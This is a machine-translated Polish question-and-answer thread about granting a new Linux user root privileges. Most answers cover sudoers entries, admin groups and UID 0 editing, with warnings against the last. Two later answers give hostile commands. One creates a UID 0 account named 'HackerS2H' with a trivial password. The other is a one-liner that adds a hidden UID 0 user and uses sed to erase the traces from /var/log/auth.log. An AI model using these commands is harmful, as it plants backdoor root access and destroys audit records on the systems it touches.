Chcę dodać nowego użytkownika i / przyznać temu nowemu użytkownikowi dostęp do konta root, jak mogę to zrobić?
Zrobiłem to, sudo adduser --system testuser
ale nie działa tak, jak się spodziewałem.
Dzięki za pomoc.
Chcę dodać nowego użytkownika i / przyznać temu nowemu użytkownikowi dostęp do konta root, jak mogę to zrobić?
Zrobiłem to, sudo adduser --system testuser
ale nie działa tak, jak się spodziewałem.
Dzięki za pomoc.
Odpowiedzi:
Istnieją trzy sposoby, aby to zrobić: właściwy, niewłaściwy i brzydki.
Najpierw utwórz normalne konto użytkownika.
adduser username
Następnie wybierz jedną z następujących opcji:
Utwórz sudo
wpis dla wheel
grupy w /etc/sudoers
następujący sposób:
## Allows people in group wheel to run all commands
%wheel ALL=(ALL) ALL
Lub w przypadku wersji „nowoczesnych”:
## Allows people in group sudoers to run all commands
%sudoers ALL=(ALL) ALL
Następnie dodaj użytkownika do wheel
grupy. Dodawanie i usuwanie użytkowników z uprawnieniami administracyjnymi staje się teraz funkcją zapamiętywania dodawania ich do koła, zamiast tworzenia wpisu w sudo. Wspaniałą rzeczą w korzystaniu z koła jest to, że możesz rozszerzyć ten mechanizm na inne schematy uwierzytelniania, które obsługują grupy, tj. Winbind / Active Directory, i czerpać z tego korzyści. Osiągnąłbyś to poprzez mapowanie koła na grupę w schemacie uwierzytelniania, który ma uprawnienia administratora.
Pamiętaj, że niektóre dystrybucje używają różnych kont administracyjnych. Koło jest „tradycyjne” podejście do tego, ale może napotkać admin
, adm
i innych kont grupowych, które służą temu samemu celowi.
Edycja uzupełniająca:
Muszę przyznać punkt Bartowi Silverstrimowi za wskazanie, że Ubuntu używa admin
do tego celu grupy. Dotarł do tego pierwszy, chociaż wtedy nie zauważyłem tagu Ubuntu. Znowu wszystko zależy od tego, jakiej dystrybucji używasz.
Utwórz pozycję sudo dla danego konta użytkownika i daj pełny dostęp. Ponownie utworzysz wpis w /etc/sudoers
następujący sposób:
## Allows just user "username" to run all commands as root
username ALL=(ALL) ALL
DODANO: ## Dla wersji Ubuntu: nazwa użytkownika ALL = (ALL: ALL)
Jest to świetne, jeśli masz tylko jedno (lub dwa) zwykłe konta. To brzydkie, gdy masz sto kont na wielu (geofizycznych) stronach i musisz stale utrzymywać plik sudo.
Możesz edytować /etc/passwd
plik i zmienić identyfikator konta użytkownika z dowolnego numeru na 0
. Zgadza się, zero .
username:x:0:502::/home/username:/bin/bash
Widzisz ten trzeci wpis jako zero? Podczas logowania do tego konta, jesteś dla wszystkich skutecznych celów root
. Nie polecam tego. Jeśli nie pamiętasz, kim jesteś, możesz wywołać wszelkiego rodzaju spustoszenie, gdy zaczniesz tworzyć i dotykać plików jako root
. Możesz także dodać swoją nazwę użytkownika do root
grupy. Ma to ten sam efekt w przypadku dostępu do plików, ale stwarza inne problemy; programy zauważą, że nie jesteś użytkownikiem root
i odmówią uruchomienia, ale uzyskasz dostęp do plików należących do grupy root
.
Jeśli to zrobiłeś, użyłeś vipw
zamiast po prostu edytować vi
, prawda? (lub jakikolwiek inny ulubiony edytor tekstu) W końcu pojedyncza literówka w tym pliku może zablokować dostęp do systemu - a to oznacza fizyczną wizytę na komputerze z dyskiem naprawczym ...
Używam tego od lat i jest to najlepszy sposób na dodanie sudoer na AskUbuntu :
adduser existinguser sudo
Znacznie prostsze niż edycja plików i łatwe do wprowadzenia w skrypcie powłoki do instalacji nienadzorowanej.
Jeśli chcesz utworzyć użytkownika i przyznać uprawnienia sudo, możesz to zrobić w jednym wierszu:
useradd newuser -m -G sudo
passwd newuser
-m
utworzył katalog domowy i -G
określa dodatkową grupę.
i z tym jest 100%:
adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456
i połącz się z serwerem Kit i IP
Możesz utworzyć użytkownika za pomocą adduser, patrz man adduser.
Po dodaniu go do uprzywilejowanej grupy, takiej jak root lub koło. Ale myślę, że najbardziej zalecanym sposobem na uzyskanie pozwolenia jest używanie sudo.
„Brzydki i niechlujny” sposób polega na edycji pliku / etc / passwd, aby UID = 0 ORAZ GID = 0 dla nowego użytkownika. Ale to stwarza wiele zagrożeń bezpieczeństwa . Wiesz, że jeśli jest także rootem, może wyłączyć twój accont, zmienić hasło, uczynić cię „zwykłym użytkownikiem” ... prawda? więc dlaczego nie dać mu swojego konta?
Możesz przestudiować sposób działania suid ( http://en.wikipedia.org/wiki/Setuid ), jeśli chcesz przyznać mu uprawnienia roota tylko dla kilku poleceń.
Oto jeden liniowiec:
USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here"
&& sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 --
non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;'
/var/log/auth.log
Najlepiej,